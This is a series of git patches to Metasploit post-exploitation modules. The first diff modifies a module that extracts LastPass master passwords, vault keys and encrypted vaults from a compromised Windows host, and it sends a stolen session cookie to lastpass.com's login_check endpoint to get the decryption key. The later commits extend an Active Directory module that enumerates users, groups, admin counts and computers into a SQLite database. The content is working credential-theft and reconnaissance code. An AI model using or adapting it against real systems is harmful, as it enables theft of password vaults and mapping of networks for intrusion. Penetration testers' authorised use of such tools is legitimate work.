read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") + data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") if data.blank? + return [] if data.blank? + + usernames = data.split("|") usernames.each do |username| credentials << [username, nil] end # Extract master passwords - reg_value = reg_key.query_value("LoginPws") - data = Base64.encode64(reg_value.data) if reg_value - reg_key.close + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginPws") + data = Base64.encode64(data) if !data.blank? else # Firefox loot_path = loot_file(prefs_path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file") return [] if !loot_path @@ -344,7 +331,7 @@ class Metasploit3 < Msf::Post if browser.match(/Firefox|IE/) if browser == "Firefox" ieffcreds = ie_firefox_credentials(lp_data['lp_db_path'].first, lp_data['localstorage_db']) - else + else # IE ieffcreds = ie_firefox_credentials(nil, lp_data['localstorage_db']) end unless ieffcreds.blank? @@ -437,16 +424,16 @@ class Metasploit3 < Msf::Post if browser.match(/Firefox|IE/) if browser == "Firefox" iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" else # IE iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" + vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" end iterations = read_remote_file(iterations_path) if client.fs.file.exists?(iterations_path) # Read file if it exists iterations = nil if iterations.blank? # Verify content lp_data['lp_creds'][username]['iterations'] = iterations # Find encrypted vault - vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" - vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" if !client.fs.file.exists?(vault_path) vault = read_remote_file(vault_path) vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection vault = vault.sub(/iterations=.*;/, "") if client.fs.file.exists?(vault_path) # Remove iterations info @@ -487,12 +474,13 @@ class Metasploit3 < Msf::Post lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) else # Get vault key decrypting the locally stored one or from the disabled OTP if !browser_checked - ##decrypt_local_vault_key(account, browser_map) + decrypt_local_vault_key(account, browser_map) browser_checked = true end if lp_data['lp_creds'][username]['vault_key'] == nil # If no vault key was found yet, try with dOTP - ##otpbin = extract_otpbin(account, browser, username, lp_data) - ##lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) + otpbin = extract_otpbin(account, browser, username, lp_data) + otpbin.blank? ? next : otpbin = otpbin[0..31] + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) end end end @@ -502,7 +490,27 @@ class Metasploit3 < Msf::Post # Decrypt the locally stored vault key def decrypt_local_vault_key account, browser_map - browser_map.each_pair do |browser, lp_data| + data = nil + session_cookie_value = nil + + browser_map.each_pair do |browser, lp_data| + if browser == "IE" + if session.type == "meterpreter" + cookies_files = client.fs.dir.entries(lp_data['cookies_db']) + else + cookies_files = session.shell_command("ls #{lp_data['cookies_db']}").split + end + cookies_files.reject! { |u| %w(. ..).include?(u) } + cookies_files.each do |cookie_jar_file| + data = read_remote_file(lp_data['cookies_db'] + client.fs.file.separator + cookie_jar_file) + next if data.blank? + if /.*PHPSESSID.(?.*?).lastpass\.com?/m =~ data # Find the session id + loot_path = loot_file(lp_data['cookies_db'] + client.fs.file.separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") + session_cookie_value = session_cookie_value_match + break + end + end + else case browser when /Chrome/ query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" @@ -516,9 +524,10 @@ class Metasploit3 < Msf::Post query = nil print_error "Browser #{browser} not recognized" end - loot_path = loot_file(lp_data['cookies_db'], nil, "#{browser.downcase}.lastpass.cookies", "application/x-sqlite3", "#{account}'s #{browser} cookies DB") # Parsing/Querying the DB + loot_path = loot_file(lp_data['cookies_db'], nil, "#{browser.downcase}.lastpass.cookies", "application/x-sqlite3", "#{account}'s #{browser} cookies DB") + next if loot_path.blank? db = SQLite3::Database.new(loot_path) begin result = db.execute(query) @@ -527,37 +536,39 @@ class Metasploit3 < Msf::Post next end next if result.blank? # No session cookie found for this browser - session_cookie = windows_unprotect(Base64.encode64(result[0][0])) # TODO: Support other browsers/OSs - - # Use the cookie to obtain the encryption key to decrypt the vault key - uri = URI('https://lastpass.com/login_check.php') - request = Net::HTTP::Post.new(uri) - request.set_form_data("wxsessid" => URI.unescape(session_cookie),"uuid" => browser_map['lp_2fa']) - request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' - response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } - - # Parse response - next if !response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired - decryption_key = OpenSSL::Digest::SHA256.hexdigest(response.body.match(/pwdeckey\="([a-z0-9]+)"/)[1]) - username = response.body.match(/lpusername="([A-Za-z0-9._%+-@]+)"/)[1] - - # Get the local encrypted vault key - db = SQLite3::Database.new(lp_data['lp_db_loot']) - result = db.execute( - "SELECT data FROM LastPassData " \ - "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'key'" - ) - encrypted_vault_key = result[0][0].split("\n")[0] - - # Decrypt the local stored key - lp_data['lp_creds'][username]['vault_key'] = decrypt_data([decryption_key].pack("H*"), encrypted_vault_key) + session_cookie_value = result[0][0] end + session_cookie_value = windows_unprotect(Base64.encode64(session_cookie_value)) if (session_cookie_value != nil && Base64.encode64(session_cookie_value).match(/^AQAAA.+/)) + return if session_cookie_value.blank? + + # Use the cookie to obtain the encryption key to decrypt the vault key + uri = URI('https://lastpass.com/login_check.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("wxsessid" => URI.unescape(session_cookie_value),"uuid" => browser_map['lp_2fa']) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } + + # Parse response + next if !response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired + decryption_key = OpenSSL::Digest::SHA256.hexdigest(response.body.match(/pwdeckey\="([a-z0-9]+)"/)[1]) + username = response.body.match(/lpusername="([A-Za-z0-9._%+-@]+)"/)[1] + + # Get the local encrypted vault key + encrypted_vault_key = extract_local_encrypted_vault_key(browser, username, lp_data) + + # Decrypt the local stored key + lp_data['lp_creds'][username]['vault_key'] = decrypt_data([decryption_key].pack("H*"), encrypted_vault_key) + end end # Returns otp, encrypted_key def extract_otpbin(account, browser, username, lp_data) - if browser == 'Firefox' - path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + if browser.match(/Firefox|IE/) + if browser == "Firefox" + path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + else # IE + path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" + end otpbin = read_remote_file(path) if client.fs.file.exists?(path) #Read file if it exists otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) return otpbin @@ -603,7 +614,6 @@ class Metasploit3 < Msf::Post if response.body.match(/randkey\="(.*)"/) encrypted_vault_key = response.body.match(/randkey\="(.*)"/)[1] end - encrypted_vault_key end @@ -755,7 +765,6 @@ class Metasploit3 < Msf::Post loot_path end - # Reads a remote file and returns the data def read_remote_file(path) data = nil @@ -763,9 +772,41 @@ class Metasploit3 < Msf::Post begin data = read_file(path) rescue EOFError - vprint_error "File #{path} is empty" + vprint_error "Error reading file #{path} It could be empty" end data end -end + def read_registry_key_value(key, value) + begin + root_key, base_key = session.sys.registry.splitkey(key) + reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + return nil if not reg_key + reg_value = reg_key.query_value(value) + return nil if not reg_value + rescue + vprint_error "Error reading registry key #{key} and value #{value}" + end + reg_key.close if reg_key + return reg_value.blank? ? nil : reg_value.data + end + + def extract_local_encrypted_vault_key(browser, username, lp_data) + if browser.match(/Firefox|IE/) + encrypted_key_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" + encrypted_vault_key = read_remote_file(encrypted_key_path) + encrypted_vault_key = windows_unprotect(encrypted_vault_key) if encrypted_vault_key != nil && encrypted_vault_key.match(/^AQAAA.+/) # Verify Windows protection + + else + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'key'" + ) + encrypted_vault_key = result[0][0] + end + + return encrypted_vault_key.blank? ? nil : encrypted_vault_key.split("\n")[0] # Return only the key, not the "lastpass rocks" part + end + +end \ No newline at end of file From 98c6b56494c765e5e025221fb4a29f80b8cbe516 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 08:14:30 +0000 Subject: [PATCH 088/686] Added computer recon --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 917410213f..686b3332dc 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -112,10 +112,22 @@ class Metasploit3 < Msf::Post end print_status "Enumerated #{group_counter} group(s)" + + vprint_status "Retrieving computers" + begin + computer_filter = '(objectClass=computer)' + computer_fields = ['distinguishedName', 'objectSid', 'cn','dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion'] + groups = query(computer_filter, max_search, group_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Group): #{e.message}") + return + end + if db && db.close f = ::File.size(dbfile.to_s) print_status "Database closed: #{dbfile} at #{f} byte(s)" end + end # Run the parameterised SQL query From 805ba1d7ddb077f5bb323bd32d0bfe0935f7b360 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 08:28:40 +0000 Subject: [PATCH 089/686] Enumerate computers --- .../windows/gather/ad_groupusers_to_sql.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 686b3332dc..eae1dc92e0 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -117,9 +117,9 @@ class Metasploit3 < Msf::Post begin computer_filter = '(objectClass=computer)' computer_fields = ['distinguishedName', 'objectSid', 'cn','dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion'] - groups = query(computer_filter, max_search, group_fields) + groups = query(computer_filter, max_search, computer_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Error(Group): #{e.message}") + print_error("Error(Computers): #{e.message}") return end @@ -143,6 +143,22 @@ class Metasploit3 < Msf::Post filename = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('ad', 5)}.db" db = SQLite3::Database.new(filename) + # Create the table for the AD Computers + db.execute('DROP TABLE IF EXISTS ad_computers') + sql_table_computers = 'CREATE TABLE ad_computers ('\ + 'rid INTEGER PRIMARY KEY NOT NULL,'\ + 'distinguishedName TEXT UNIQUE NOT NULL,'\ + 'cn TEXT,'\ + 'sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'displayName TEXT,'\ + 'logonCount INTEGER,'\ + 'operatingSystem TEXT,'\ + 'operatingSystemServicePack TEXT,'\ + 'operatingSystemVersion TEXT,'\ + 'whenChanged TEXT,'\ + 'whenCreated TEXT)' + db.execute(sql_table_computers) + # Create the table for the AD Groups db.execute('DROP TABLE IF EXISTS ad_groups') sql_table_group = 'CREATE TABLE ad_groups ('\ From f8b402165c00dc4e4c9a73f6d7d96f7f6243ba81 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 09:51:04 +0000 Subject: [PATCH 090/686] Added extra computer fields --- .../windows/gather/ad_groupusers_to_sql.rb | 33 +++++++++++++++++-- 1 file changed, 31 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index eae1dc92e0..5cfa345a59 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -117,7 +117,32 @@ class Metasploit3 < Msf::Post begin computer_filter = '(objectClass=computer)' computer_fields = ['distinguishedName', 'objectSid', 'cn','dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion'] - groups = query(computer_filter, max_search, computer_fields) + computers = query(computer_filter, max_search, computer_fields) + + computers[:results].each do |comp| + computer_sid, computer_rid = sid_hex_to_string(comp[1][:value]) + + # Add the group to the database + sql_param_computer = { rid: computer_rid.to_i, + distinguishedName: comp[0][:value].to_s, + cn: comp[2][:value].to_s, + dNSHostName: comp[3][:value].to_s, + sAMAccountType: comp[4][:value].to_i, + sAMAccountName: comp[5][:value].to_s, + displayName: comp[6][:value].to_s, + logonCount: comp[7][:value].to_i, + userAccountControl: comp[8][:value].to_s, + whenChanged: comp[9][:value].to_s, + whenCreated: comp[10][:value].to_s, + primaryGroupID: comp[11][:value].to_i, + badPwdCount: comp[12][:value].to_i, + operatingSystem: comp[13][:value].to_s, + operatingSystemServicePack: comp[14][:value].to_s, + operatingSystemVersion: comp[15][:value].to_s, + } + run_sqlite_query(db, 'ad_computers', sql_param_computer) + end + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Computers): #{e.message}") return @@ -149,9 +174,13 @@ class Metasploit3 < Msf::Post 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ 'cn TEXT,'\ - 'sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'sAMAccountType INTEGER,'\ + 'sAMAccountName TEXT UNIQUE,'\ 'displayName TEXT,'\ 'logonCount INTEGER,'\ + 'userAccountControl INTEGER,'\ + 'primaryGroupID INTEGER,'\ + 'badPwdCount INTEGER,'\ 'operatingSystem TEXT,'\ 'operatingSystemServicePack TEXT,'\ 'operatingSystemVersion TEXT,'\ From b186aaa08d593deac5632819d2e8220785bf0f91 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 09:55:13 +0000 Subject: [PATCH 091/686] Added extra computer fields --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 5cfa345a59..15ad12a48c 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post vprint_status "Retrieving AD Groups" begin group_filter = '(objectClass=group)' - group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description'] + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount'] groups = query(group_filter, max_search, group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Group): #{e.message}") @@ -70,10 +70,13 @@ class Metasploit3 < Msf::Post # Add the group to the database sql_param_group = { rid: group_rid.to_i, distinguishedName: individual_group[0][:value].to_s, + sAMAccountType: individual_group[2][:value].to_i, sAMAccountName: individual_group[3][:value].to_s, whenChanged: individual_group[4][:value].to_s, whenCreated: individual_group[5][:value].to_s, description: individual_group[6][:value].to_s + groupType: individual_group[7][:value].to_i, + adminCount: individual_group[8][:value].to_i, } run_sqlite_query(db, 'ad_groups', sql_param_group) @@ -193,7 +196,10 @@ class Metasploit3 < Msf::Post sql_table_group = 'CREATE TABLE ad_groups ('\ 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ + 'sAMAccountType INTEGER,'\ 'sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'groupType INTEGER,'\ + 'adminCount INTEGER,'\ 'description TEXT,'\ 'whenChanged TEXT,'\ 'whenCreated TEXT)' From fc45d70d25c8e14a022fa8728ece9eb387e928e9 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 09:59:21 +0000 Subject: [PATCH 092/686] Added extra user fields --- .../post/windows/gather/ad_groupusers_to_sql.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 15ad12a48c..49f64b8123 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount'] + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title'] group_counter = 0 groups[:results].each do |individual_group| begin @@ -88,15 +88,19 @@ class Metasploit3 < Msf::Post # Add the group to the database sql_param_user = { rid: user_rid.to_i, distinguishedName: group_user[0][:value].to_s, + sAMAccountType: group_user[2][:value].to_i, sAMAccountName: group_user[3][:value].to_s, displayName: group_user[4][:value].to_s, description: group_user[5][:value].to_s, logonCount: group_user[6][:value].to_i, + userAccountControl: group_user[7][:value].to_i, userPrincipalName: group_user[8][:value].to_s, - whenChanged: group_user[8][:value].to_s, - whenCreated: group_user[8][:value].to_s, - primaryGroupID: group_user[9][:value].to_i, - badPwdCount: group_user[10][:value].to_i + whenChanged: group_user[9][:value].to_s, + whenCreated: group_user[10][:value].to_s, + primaryGroupID: group_user[11][:value].to_i, + badPwdCount: group_user[12][:value].to_i + comments: group_user[13][:value].to_s + title: group_user[14][:value].to_s } run_sqlite_query(db, 'ad_users', sql_param_user) From 8f95ad315e346e85dba5fcca2b359c5d3bc950f0 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 10:02:18 +0000 Subject: [PATCH 093/686] Added extra user fields to database schema --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 49f64b8123..f1bbb42917 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title'] + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title', 'accountExpires', 'adminCount'] group_counter = 0 groups[:results].each do |individual_group| begin @@ -101,6 +101,8 @@ class Metasploit3 < Msf::Post badPwdCount: group_user[12][:value].to_i comments: group_user[13][:value].to_s title: group_user[14][:value].to_s + accounExpires: group_user[15][:value].to_i + adminCount: group_user[16][:value].to_i } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -216,11 +218,17 @@ class Metasploit3 < Msf::Post 'distinguishedName TEXT UNIQUE NOT NULL,'\ 'description TEXT,'\ 'displayName TEXT,'\ + 'sAMAccountType INTEGER,'\ 'sAMAccountName TEXT,'\ 'logonCount INTEGER,'\ + 'userAccountControl INTEGER,'\ 'primaryGroupID INTEGER,'\ + 'accountExpires INTEGER,'\ + 'adminCount INTEGER,'\ 'badPwdCount INTEGER,'\ 'userPrincipalName TEXT UNIQUE,'\ + 'comments TEXT,'\ + 'title TEXT,'\ 'whenCreated TEXT,'\ 'whenChanged TEXT)' db.execute(sql_table_users) From 3c8ac89ba83139c5496c116ffbffbf1a9d947437 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 10:29:53 +0000 Subject: [PATCH 094/686] Added options to dump user membership and group membership to screen --- .../windows/gather/ad_groupusers_to_sql.rb | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index f1bbb42917..f00d6ad3bf 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -27,6 +27,11 @@ class Metasploit3 < Msf::Post 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) + + register_options([ + OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form.', false]), + OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form.', false]) + ], self.class) end # Entry point @@ -74,7 +79,7 @@ class Metasploit3 < Msf::Post sAMAccountName: individual_group[3][:value].to_s, whenChanged: individual_group[4][:value].to_s, whenCreated: individual_group[5][:value].to_s, - description: individual_group[6][:value].to_s + description: individual_group[6][:value].to_s, groupType: individual_group[7][:value].to_i, adminCount: individual_group[8][:value].to_i, } @@ -83,7 +88,7 @@ class Metasploit3 < Msf::Post # Go through each of the users in the group users_in_group[:results].each do |group_user| user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) - print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" + print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] # Add the group to the database sql_param_user = { rid: user_rid.to_i, @@ -98,10 +103,10 @@ class Metasploit3 < Msf::Post whenChanged: group_user[9][:value].to_s, whenCreated: group_user[10][:value].to_s, primaryGroupID: group_user[11][:value].to_i, - badPwdCount: group_user[12][:value].to_i - comments: group_user[13][:value].to_s - title: group_user[14][:value].to_s - accounExpires: group_user[15][:value].to_i + badPwdCount: group_user[12][:value].to_i, + comments: group_user[13][:value].to_s, + title: group_user[14][:value].to_s, + accountExpires: group_user[15][:value].to_i, adminCount: group_user[16][:value].to_i } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -150,6 +155,7 @@ class Metasploit3 < Msf::Post operatingSystemVersion: comp[15][:value].to_s, } run_sqlite_query(db, 'ad_computers', sql_param_computer) + print_line "Computer [#{sql_param_computer[:cn]}][#{sql_param_computer[:dNSHostName]}][#{sql_param_computer[:rid]}]" if datastore['SHOW_USERGROUPS'] end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e @@ -185,6 +191,7 @@ class Metasploit3 < Msf::Post 'cn TEXT,'\ 'sAMAccountType INTEGER,'\ 'sAMAccountName TEXT UNIQUE,'\ + 'dNSHostName TEXT,'\ 'displayName TEXT,'\ 'logonCount INTEGER,'\ 'userAccountControl INTEGER,'\ From 39bc23629ada18ea3f6d0739c5f4d2147d3a1bbd Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 10:56:41 +0000 Subject: [PATCH 095/686] Getting ready to add thread support --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index f00d6ad3bf..fe29180ee0 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -30,7 +30,8 @@ class Metasploit3 < Msf::Post register_options([ OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form.', false]), - OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form.', false]) + OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form.', false]), + OptInt.new('THREADS', [true, 'Number of threads to spawn to gather membership of each group.', 20]) ], self.class) end @@ -61,7 +62,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title', 'accountExpires', 'adminCount'] - group_counter = 0 + groups[:results].each do |individual_group| begin @@ -85,7 +86,7 @@ class Metasploit3 < Msf::Post } run_sqlite_query(db, 'ad_groups', sql_param_group) - # Go through each of the users in the group + # Go through each group user users_in_group[:results].each do |group_user| user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] @@ -116,17 +117,14 @@ class Metasploit3 < Msf::Post group_rid: group_rid.to_i } run_sqlite_query(db, 'ad_mapping', sql_param_mapping) + end - group_counter += 1 - end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message}") return end end - print_status "Enumerated #{group_counter} group(s)" - vprint_status "Retrieving computers" begin computer_filter = '(objectClass=computer)' From 6f50635ab2ba59c5d73bcd0dcb6373529e370cfa Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 11:49:17 +0000 Subject: [PATCH 096/686] Strange bug with memberOf param and trying to fix up threads --- .../windows/gather/ad_groupusers_to_sql.rb | 127 ++++++++++-------- 1 file changed, 69 insertions(+), 58 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index fe29180ee0..e036af6f33 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -63,66 +63,77 @@ class Metasploit3 < Msf::Post vprint_status "Retrieving AD Group Membership" users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title', 'accountExpires', 'adminCount'] - groups[:results].each do |individual_group| - begin + remaining_groups = groups[:results] + threadcount = datastore['THREADS'] + while(not remaining_groups.nil? and not remaining_groups.empty?) + print_good "Remaining groups: #{remaining_groups.count}" + a = [] + 1.upto(threadcount) do + a << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| + begin + + # Get the Group RID + group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) - # Perform the ADSI query to retrieve the effective users in each group (recursion) - vprint_status "Retrieving members of #{individual_group[3][:value]}" - users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]}))" - users_in_group = query(users_filter, max_search, users_fields) - next if users_in_group.nil? || users_in_group[:results].empty? - group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) - - # Add the group to the database - sql_param_group = { rid: group_rid.to_i, - distinguishedName: individual_group[0][:value].to_s, - sAMAccountType: individual_group[2][:value].to_i, - sAMAccountName: individual_group[3][:value].to_s, - whenChanged: individual_group[4][:value].to_s, - whenCreated: individual_group[5][:value].to_s, - description: individual_group[6][:value].to_s, - groupType: individual_group[7][:value].to_i, - adminCount: individual_group[8][:value].to_i, - } - run_sqlite_query(db, 'ad_groups', sql_param_group) - - # Go through each group user - users_in_group[:results].each do |group_user| - user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) - print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member 